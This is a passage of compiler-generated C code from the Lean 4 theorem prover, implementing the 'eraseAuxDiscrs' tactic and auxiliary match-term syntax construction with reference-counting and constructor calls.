lean_object* x_26; x_24 = lean_usize_of_nat(x_20); lean_dec(x_20); x_25 = lean_usize_of_nat(x_21); lean_dec(x_21); x_26 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_19, x_24, x_25, x_2); return x_26; } } } } else { lean_object* x_27; lean_object* x_28; lean_object* x_29; lean_object* x_30; uint8_t x_31; x_27 = lean_ctor_get(x_1, 0); x_28 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4(x_27, x_2); x_29 = lean_ctor_get(x_1, 1); x_30 = lean_array_get_size(x_29); x_31 = lean_nat_dec_lt(x_4, x_30); if (x_31 == 0) { lean_dec(x_30); return x_28; } else { uint8_t x_32; x_32 = lean_nat_dec_le(x_30, x_30); if (x_32 == 0) { lean_dec(x_30); return x_28; } else { size_t x_33; size_t x_34; lean_object* x_35; x_33 = 0; x_34 = lean_usize_of_nat(x_30); lean_dec(x_30); x_35 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_29, x_33, x_34, x_28); return x_35; } } } } } lean_object* l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; lean_object* x_5; x_4 = lean_ctor_get(x_1, 1); x_5 = l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2(x_4, x_2, x_3); return x_5; } } lean_object* l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10, lean_object* x_11) { _start: { if (lean_obj_tag(x_1) == 0) { lean_object* x_12; lean_dec(x_10); lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); x_12 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_12, 0, x_2); lean_ctor_set(x_12, 1, x_11); return x_12; } else { lean_object* x_13; lean_object* x_14; lean_object* x_15; x_13 = lean_ctor_get(x_1, 0); lean_inc(x_13); x_14 = lean_ctor_get(x_1, 1); lean_inc(x_14); lean_dec(x_1); lean_inc(x_10); lean_inc(x_9); lean_inc(x_8); lean_inc(x_7); x_15 = l_Lean_Meta_tryClear(x_2, x_13, x_7, x_8, x_9, x_10, x_11); if (lean_obj_tag(x_15) == 0) { lean_object* x_16; lean_object* x_17; x_16 = lean_ctor_get(x_15, 0); lean_inc(x_16); x_17 = lean_ctor_get(x_15, 1); lean_inc(x_17); lean_dec(x_15); x_1 = x_14; x_2 = x_16; x_11 = x_17; goto _start; } else { uint8_t x_19; lean_dec(x_14); lean_dec(x_10); lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); x_19 = !lean_is_exclusive(x_15); if (x_19 == 0) { return x_15; } else { lean_object* x_20; lean_object* x_21; lean_object* x_22; x_20 = lean_ctor_get(x_15, 0); x_21 = lean_ctor_get(x_15, 1); lean_inc(x_21); lean_inc(x_20); lean_dec(x_15); x_22 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_22, 0, x_20); lean_ctor_set(x_22, 1, x_21); return x_22; } } } } } lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10) { _start: { lean_object* x_11; lean_object* x_12; lean_object* x_13; lean_object* x_14; x_11 = lean_box(0); x_12 = lean_unsigned_to_nat(0u); x_13 = l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1(x_1, x_11, x_12); x_14 = l_Lean_Elab_Tactic_getMainGoal(x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10); if (lean_obj_tag(x_14) == 0) { lean_object* x_15; lean_object* x_16; lean_object* x_17; x_15 = lean_ctor_get(x_14, 0); lean_inc(x_15); x_16 = lean_ctor_get(x_14, 1); lean_inc(x_16); lean_dec(x_14); lean_inc(x_9); lean_inc(x_8); lean_inc(x_7); lean_inc(x_6); x_17 = l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7(x_13, x_15, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_16); if (lean_obj_tag(x_17) == 0) { lean_object* x_18; lean_object* x_19; lean_object* x_20; lean_object* x_21; x_18 = lean_ctor_get(x_17, 0); lean_inc(x_18); x_19 = lean_ctor_get(x_17, 1); lean_inc(x_19); lean_dec(x_17); x_20 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_20, 0, x_18); lean_ctor_set(x_20, 1, x_11); x_21 = l_Lean_Elab_Tactic_replaceMainGoal(x_20, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_19); lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); return x_21; } else { uint8_t x_22; lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); x_22 = !lean_is_exclusive(x_17); if (x_22 == 0) { return x_17; } else { lean_object* x_23; lean_object* x_24; lean_object* x_25; x_23 = lean_ctor_get(x_17, 0); x_24 = lean_ctor_get(x_17, 1); lean_inc(x_24); lean_inc(x_23); lean_dec(x_17); x_25 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_25, 0, x_23); lean_ctor_set(x_25, 1, x_24); return x_25; } } } else { uint8_t x_26; lean_dec(x_13); lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); x_26 = !lean_is_exclusive(x_14); if (x_26 == 0) { return x_14; } else { lean_object* x_27; lean_object* x_28; lean_object* x_29; x_27 = lean_ctor_get(x_14, 0); x_28 = lean_ctor_get(x_14, 1); lean_inc(x_28); lean_inc(x_27); lean_dec(x_14); x_29 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_29, 0, x_27); lean_ctor_set(x_29, 1, x_28); return x_29; } } } } static lean_object* _init_l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1() { _start: { lean_object* x_1; x_1 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1___boxed), 10, 0); return x_1; } } static lean_object* _init_l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2() { _start: { lean_object* x_1; lean_object* x_2; lean_object* x_3; x_1 = l___private_Lean_Elab_Tactic_Basic_0__Lean_Elab_Tactic_sortFVarIds___closed__1; x_2 = l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1; x_3 = lean_alloc_closure((void*)(l_ReaderT_bind___at_Lean_Elab_Tactic_liftMetaMAtMain___spec__1___rarg), 11, 2); lean_closure_set(x_3, 0, x_1); lean_closure_set(x_3, 1, x_2); return x_3; } } lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9) { _start: { lean_object* x_10; lean_object* x_11; x_10 = l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2; x_11 = l_Lean_Elab_Tactic_withMainContext___rarg(x_10, x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9); return x_11; } } lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs(lean_object* x_1) { _start: { lean_object* x_2; x_2 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg), 9, 0); return x_2; } } lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4) { _start: { size_t x_5; size_t x_6; lean_object* x_7; x_5 = lean_unbox_usize(x_2); lean_dec(x_2); x_6 = lean_unbox_usize(x_3); lean_dec(x_3); x_7 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5(x_1, x_5, x_6, x_4); lean_dec(x_1); return x_7; } } lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4) { _start: { size_t x_5; size_t x_6; lean_object* x_7; x_5 = lean_unbox_usize(x_2); lean_dec(x_2); x_6 = lean_unbox_usize(x_3); lean_dec(x_3); x_7 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_1, x_5, x_6, x_4); lean_dec(x_1); return x_7; } } lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4___boxed(lean_object* x_1, lean_object* x_2) { _start: { lean_object* x_3; x_3 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4(x_1, x_2); lean_dec(x_1); return x_3; } } lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4) { _start: { size_t x_5; size_t x_6; lean_object* x_7; x_5 = lean_unbox_usize(x_2); lean_dec(x_2); x_6 = lean_unbox_usize(x_3); lean_dec(x_3); x_7 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3(x_1, x_5, x_6, x_4); lean_dec(x_1); return x_7; } } lean_object* l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; x_4 = l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2(x_1, x_2, x_3); lean_dec(x_3); lean_dec(x_1); return x_4; } } lean_object* l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; x_4 = l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1(x_1, x_2, x_3); lean_dec(x_3); lean_dec(x_1); return x_4; } } lean_object* l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10, lean_object* x_11) { _start: { lean_object* x_12; x_12 = l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7(x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10, x_11); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); return x_12; } } lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10) { _start: { lean_object* x_11; x_11 = l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1(x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); lean_dec(x_1); return x_11; } } lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___boxed(lean_object* x_1) { _start: { lean_object* x_2; x_2 = l_Lean_Elab_Tactic_evalEraseAuxDiscrs(x_1); lean_dec(x_1); return x_2; } } static lean_object* _init_l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1() { _start: { lean_object* x_1; x_1 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_evalEraseAuxDiscrs___boxed), 1, 0); return x_1; } } lean_object* l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs(lean_object* x_1) { _start: { lean_object* x_2; lean_object* x_3; lean_object* x_4; lean_object* x_5; x_2 = l_Lean_Elab_Tactic_tacticElabAttribute; x_3 = l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__2; x_4 = l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1; x_5 = l_Lean_KeyedDeclsAttribute_addBuiltin___rarg(x_2, x_3, x_4, x_1); return x_5; } } static lean_object* _init_l_Lean_Elab_Tactic_AuxMatchTermState_nextIdx___default() { _start: { lean_object* x_1; x_1 = lean_unsigned_to_nat(1u); return x_1; } } static lean_object* _init_l_Lean_Elab_Tactic_AuxMatchTermState_cases___default() { _start: { lean_object* x_1; x_1 = l_Array_empty___closed__1; return x_1; } } lean_object* l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; lean_object* x_5; lean_object* x_6; lean_object* x_7; x_4 = lean_ctor_get(x_2, 5); x_5 = l_Lean_SourceInfo_fromRef(x_4); x_6 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_6, 0, x_5); lean_ctor_set(x_6, 1, x_1); x_7 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_7, 0, x_6); lean_ctor_set(x_7, 1, x_3); return x_7; } } static lean_object* _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1() { _start: { lean_object* x_1; x_1 = lean_mk_string("rhs"); return x_1; } } static lean_object* _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2() { _start: { lean_object* x_1; lean_object* x_2; x_1 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1; x_2 = lean_string_utf8_byte_size(x_1); return x_2; } } static lean_object* _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3() { _start: { lean_object* x_1; lean_object* x_2; lean_object* x_3; lean_object* x_4; x_1 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1; x_2 = lean_unsigned_to_nat(0u); x_3 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2; x_4 = lean_alloc_ctor(0, 3, 0); lean_ctor_set(x_4, 0, x_1); lean_ctor_set(x_4, 1, x_2); lean_ctor_set(x_4, 2, x_3); return x_4; } } static lean_object* _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4() { _start: { lean_object* x_1; lean_object* x_2; lean_object* x_3; x_1 = lean_box(0); x_2 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1; x_3 = lean_name_mk_string(x_1, x_2); return x_3; } } lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2(lean_object* x_1, lean_object* x_2, size_t x_3, size_t x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8) { _start: { uint8_t x_9; x_9 = x_4 < x_3; if (x_9 == 0) { lean_object* x_10; lean_object* x_11; lean_object* x_12; lean_dec(x_7); lean_dec(x_1); x_10 = x_5; x_11 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_11, 0, x_10); lean_ctor_set(x_11, 1, x_6); x_12 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_12, 0, x_11); lean_ctor_set(x_12, 1, x_8); return x_12; } else { lean_object* x_13; lean_object* x_14; lean_object* x_15; lean_object* x_16; lean_object* x_17; lean_object* x_26; lean_object* x_27; lean_object* x_28; lean_object* x_29; lean_object* x_30; lean_object* x_31; uint8_t x_32; x_13 = lean_array_uget(x_5, x_4); x_14 = lean_unsigned_to_nat(0u); x_15 = lean_array_uset(x_5, x_4, x_14); x_26 = x_13; x_27 = l_myMacro____x40_Init_Notation___hyg_13954____closed__10; x_28 = l_Lean_Syntax_setKind(x_26, x_27); x_29 = lean_unsigned_to_nat(3u); x_30 = l_Lean_Syntax_getArg(x_28, x_29); x_31 = l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_18957____closed__5; lean_inc(x_30); x_32 = l_Lean_Syntax_isOfKind(x_30, x_31); if (x_32 == 0) { lean_object* x_33; uint8_t x_34; x_33 = l_myMacro____x40_Init_Notation___hyg_13954____closed__13; lean_inc(x_30); x_34 = l_Lean_Syntax_isOfKind(x_30, x_33); if (x_34 == 0) { lean_object* x_35; lean_object* x_36; lean_object* x_37; lean_object* x_38; lean_object* x_39; lean_object* x_40; lean_object* x_41; lean_object* x_42; lean_object* x_43; lean_object* x_44; lean_object* x_45; lean_object* x_46; lean_object* x_47; lean_object* x_48; lean_object* x_49; lean_object* x_50; lean_object* x_51; lean_object* x_52; lean_object* x_53; lean_object* x_54; lean_object* x_55; lean_object* x_56; lean_object* x_57; lean_object* x_58; lean_object* x_59; lean_object* x_60; lean_object* x_61; lean_object* x_62; uint8_t x_63; x_35 = lean_unsigned_to_nat(1u); x_36 = lean_nat_add(x_8, x_35); x_37 = lean_ctor_get(x_7, 0); lean_inc(x_37); x_38 = lean_ctor_get(x_7, 1); lean_inc(x_38); x_39 = lean_ctor_get(x_7, 3); lean_inc(x_39); x_40 = lean_ctor_get(x_7, 4); lean_inc(x_40); x_41 = lean_ctor_get(x_7, 5); lean_inc(x_41); lean_inc(x_8); lean_inc(x_38); x_42 = lean_alloc_ctor(0, 6, 0); lean_ctor_set(x_42, 0, x_37); lean_ctor_set(x_42, 1, x_38); lean_ctor_set(x_42, 2, x_8); lean_ctor_set(x_42, 3, x_39); lean_ctor_set(x_42, 4, x_40); lean_ctor_set(x_42, 5, x_41); x_43 = l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(x_6, x_42, x_36); x_44 = lean_ctor_get(x_43, 0); lean_inc(x_44); x_45 = lean_ctor_get(x_43, 1); lean_inc(x_45); lean_dec(x_43); x_46 = lean_ctor_get(x_44, 0); lean_inc(x_46); x_47 = lean_ctor_get(x_44, 1); lean_inc(x_47); lean_dec(x_44); x_48 = l_stx___x3f___closed__3; lean_inc(x_46); x_49 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_49, 0, x_46); lean_ctor_set(x_49, 1, x_48); x_50 = l_Array_empty___closed__1; x_51 = lean_array_push(x_50, x_49); x_52 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4; x_53 = l_Lean_addMacroScope(x_38, x_52, x_8); x_54 = lean_box(0); x_55 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3; x_56 = lean_alloc_ctor(3, 4, 0); lean_ctor_set(x_56, 0, x_46); lean_ctor_set(x_56, 1, x_55); lean_ctor_set(x_56, 2, x_53); lean_ctor_set(x_56, 3, x_54); x_57 = lean_array_push(x_51, x_56); x_58 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_58, 0, x_31); lean_ctor_set(x_58, 1, x_57); x_59 = l_Lean_Syntax_getArg(x_58, x_35); x_60 = l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(x_47, x_42, x_45); lean_dec(x_42); x_61 = lean_ctor_get(x_60, 0); lean_inc(x_61); x_62 = lean_ctor_get(x_60, 1); lean_inc(x_62); lean_dec(x_60); x_63 = !lean_is_exclusive(x_61); if (x_63 == 0) { lean_object* x_64; lean_object* x_65; lean_object* x_66; lean_object* x_67; lean_object* x_68; lean_object* x_69; lean_object* x_70; lean_object* x_71; lean_object* x_72; lean_object* x_73; lean_object* x_74; lean_object* x_75; lean_object* x_76; lean_object* x_77; lean_object* x_78; lean_object* x_79; lean_object* x_80; lean_object* x_81; lean_object* x_82; lean_object* x_83; lean_object* x_84; lean_object* x_85; lean_object* x_86; lean_object* x_87; lean_object* x_88; lean_object* x_89; lean_object* x_90; lean_object* x_91; lean_object* x_92; lean_object* x_93; lean_object* x_94; lean_object* x_95; lean_object* x_96; lean_object* x_97; lean_object* x_98; lean_object* x_99; lean_object* x_100; lean_object* x_101; lean_object* x_102; lean_object* x_103; lean_object* x_104; lean_object* x_105; lean_object* x_106; lean_object* x_107; lean_object* x_108; lean_object* x_109; lean_object* x_110; lean_object* x_111; lean_object* x_112; lean_object* x_113; lean_object* x_114; uint8_t x_115; x_64 = lean_ctor_get(x_61, 0); x_65 = lean_ctor_get(x_61, 1); x_66 = l_Lean_Parser_Tactic_case___closed__1; lean_inc(x_64); x_67 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_67, 0, x_64); lean_ctor_set(x_67, 1, x_66); x_68 = lean_array_push(x_50, x_67); x_69 = lean_array_push(x_68, x_59); x_70 = lean_unsigned_to_nat(2u); x_71 = l_Lean_Syntax_getArg(x_28, x_70); x_72 = l_Lean_Syntax_getHeadInfo(x_71); lean_dec(x_71); x_73 = l_myMacro____x40_Init_Notation___hyg_13352____closed__13; x_74 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_74, 0, x_72); lean_ctor_set(x_74, 1, x_73); x_75 = lean_array_push(x_69, x_74); x_76 = l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__5; lean_inc(x_64); x_77 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_77, 0, x_64); lean_ctor_set(x_77, 1, x_76); x_78 = lean_array_push(x_50, x_77); x_79 = l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__2; x_80 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_80, 0, x_79); lean_ctor_set(x_80, 1, x_78); x_81 = lean_array_push(x_50, x_80); x_82 = l_myMacro____x40_Init_Notation___hyg_15419____closed__12; lean_inc(x_64); x_83 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_83, 0, x_64); lean_ctor_set(x_83, 1, x_82); x_84 = lean_array_push(x_50, x_83); x_85 = l_Lean_nullKind___closed__2; x_86 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_86, 0, x_85); lean_ctor_set(x_86, 1, x_84); x_87 = lean_array_push(x_81, x_86); x_88 = l_Lean_groupKind___closed__2; x_89 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_89, 0, x_88); lean_ctor_set(x_89, 1, x_87); x_90 = lean_array_push(x_50, x_89); x_91 = l_prec_x28___x29___closed__3; lean_inc(x_64); x_92 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_92, 0, x_64); lean_ctor_set(x_92, 1, x_91); x_93 = lean_array_push(x_50, x_92); x_94 = lean_array_push(x_93, x_30); x_95 = l_prec_x28___x29___closed__7; x_96 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_96, 0, x_64); lean_ctor_set(x_96, 1, x_95); x_97 = lean_array_push(x_94, x_96); x_98 = l_Lean_Parser_Tactic_paren___closed__1; x_99 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_99, 0, x_98); lean_ctor_set(x_99, 1, x_97); x_100 = lean_array_push(x_50, x_99); x_101 = l_myMacro____x40_Init_Notation___hyg_1481____closed__8; x_102 = lean_array_push(x_100, x_101); x_103 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_103, 0, x_88); lean_ctor_set(x_103, 1, x_102); x_104 = lean_array_push(x_90, x_103); x_105 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_105, 0, x_85); lean_ctor_set(x_105, 1, x_104); x_106 = lean_array_push(x_50, x_105); x_107 = l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__5; x_108 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_108, 0, x_107); lean_ctor_set(x_108, 1, x_106); x_109 = lean_array_push(x_50, x_108); x_110 = l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__3; x_111 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_111, 0, x_110); lean_ctor_set(x_111, 1, x_109); x_112 = lean_array_push(x_75, x_111); x_113 = l_Lean_Parser_Tactic_case___closed__2; x_114 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_114, 0, x_113); lean_ctor_set(x_114, 1, x_112); x_115 = !lean_is_exclusive(x_65); if (x_115 == 0) { lean_object* x_116; lean_object* x_117; lean_object* x_118; x_116 = lean_ctor_get(x_65, 1); x_117 = lean_array_push(x_116, x_114); lean_ctor_set(x_65, 1, x_117); x_118 = l_Lean_Syntax_setArg(x_28, x_29, x_58); lean_ctor_set(x_61, 0, x_118); x_16 = x_61; x_17 = x_62; goto block_25; } else { lean_object* x_119; lean_object* x_120; lean_object* x_121; lean_object* x_122; lean_object* x_123; x_119 = lean_ctor_get(x_65, 0); x_120 = lean_ctor_get(x_65, 1); lean_inc(x_120); lean_inc(x_119); lean_dec(x_65); x_121 = lean_array_push(x_120, x_114); x_122 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_122, 0, x_119); lean_ctor_set(x_122, 1, x_121); x_123 = l_Lean_Syntax_setArg(x_28, x_29, x_58); lean_ctor_set(x_61, 1, x_122); lean_ctor_set(x_61, 0, x_123); x_16 = x_61; x_17 = x_62; goto block_25; } } else { lean_object* x_124; lean_object* x_125; lean_object* x_126; lean_object* x_127; lean_object* x_128; lean_object* x_129; lean_object* x_130; lean_object* x_131; lean_object* x_132; lean_object* x_133; lean_object* x_134; lean_object* x_135; lean_object* x_136; lean_object* x_137; lean_object* x_138; lean_object* x_139; lean_object* x_140; lean_object* x_141; lean_object* x_142; lean_object* x_143; lean_object* x_144; lean_object* x_145; lean_object* x_146; lean_object* x_147; lean_object* x_148; lean_object* x_149; lean_object* x_150; lean_object* x_151; lean_object* x_152; lean_object* x_153; lean_object* x_154; lean_object* x_155; lean_object* x_156; lean_object* x_157; lean_object* x_158; lean_object* x_159; lean_object* x_160; lean_object* x_161; lean_object* x_162; lean_object* x_163; lean_object* x_164; lean_object* x_165; lean_object* x_166; lean_object* x_167; lean_object* x_168; lean_object* x_169; lean_object* x_170; lean_object* x_171; lean_object* x_172; lean_object* x_173; lean_object* x_174; lean_object* x_175; lean_object* x_176; lean_object* x_177; lean_object* x_178; lean_object* x_179; lean_object* x_180; lean_object* x_181; x_124 = lean_ctor_get(x_61, 0); x_125 = lean_ctor_get(x_61, 1); lean_inc(x_125); lean_inc(x_124); lean_dec(x_61); x_126 = l_Lean_Parser_Tactic_case___closed__1; lean_inc(x_124); x_127 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_127, 0, x_124); lean_ctor_set(x_127, 1, x_126); x_128 = lean_array_push(x_50, x_127); x_129 = lean_array_push(x_128, x_59); x_130 = lean_unsigned_to_nat(2u); x_131 = l_Lean_Syntax_getArg(x_28, x_130); x_132 = l_Lean_Syntax_getHeadInfo(x_131); lean_dec(x_131); x_133 = l_myMacro____x40_Init_Notation___hyg_13352____closed__13; x_134 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_134, 0, x_132); lean_ctor_set(x_134, 1, x_133); x_135 = lean_array_push(x_129, x_134); x_136 = l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__5; lean_inc(x_124); x_137 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_137, 0, x_124); lean_ctor_set(x_137, 1, x_136); x_138 = lean_array_push(x_50, x_137); x_139 = l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__2; x_140 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_140, 0, x_139); lean_ctor_set(x_140, 1, x_138); x_141 = lean_array_push(x_50, x_140); x_142 = l_myMacro____x40_Init_Notation___hyg_15419____closed__12; lean_inc(x_124); x_143 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_143, 0, x_124); lean_ctor_set(x_143, 1, x_142); x_144 = lean_array_push(x_50, x_143); x_145 = l_Lean_nullKind___closed__2; x_146 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_146, 0, x_145); lean_ctor_set(x_146, 1, x_144); x_147 = lean_array_push(x_141, x_146); x_148 = l_Lean_groupKind___closed__2; x_149 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_149, 0, x_148); lean_ctor_set(x_149, 1, x_147); x_150 = lean_array_push(x_50, x_149); x_151 = l_prec_x28___x29___closed__3; lean_inc(x_124); x_152 = lean_alloc_ctor(2, 